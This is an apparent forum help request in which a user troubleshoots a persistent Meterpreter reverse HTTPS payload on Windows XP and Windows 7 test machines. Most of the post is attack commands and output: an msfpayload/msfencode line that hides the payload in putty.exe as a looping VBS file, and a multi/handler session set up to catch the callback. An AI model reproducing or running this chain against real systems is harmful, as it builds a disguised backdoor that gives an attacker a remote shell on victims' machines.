I've got a problem with the new Persistent Meterpreter over Reverse HTTPS HD Moore posted some time ago.
I'm running BT4 using Metasploit 3.3 (already tried a new manaual svn installation) and I just can't get things to work. Everytime I follow the instructions, create the vbs-file, start the handler and all I get is a 100% cpu process wscript.exe on the test victim. As mentioned in the blog post, I tested the handler with WAVE successfully. Does anyone know how to solve this issue? Here are the commands I use:
./msfpayload windows/meterpreter/reverse_https LHOST=xxx.xxx.xxx.xxx LPORT=xxxx R | ./msfencode -x /r
oot/payloads/putty.exe -t loop-vbs -o /root/test/final.vbs
Tested victims are Win XP SP2 and Win 7. Same behaviour on both of'em.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT xxxx
LPORT => xxxx
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j[*] Exploit running as background job.
msf exploit(handler) >[*] HTTPS listener started on https://xxx.xxx.xxx.xxx:xxxx/[*] Starting the payload handler...
Help would be highly appreciated. Please let me know if you need some more information! Thanks in advance!
If my problem's too special for the beginner's forum, could a mod please move the thread to the expert's area?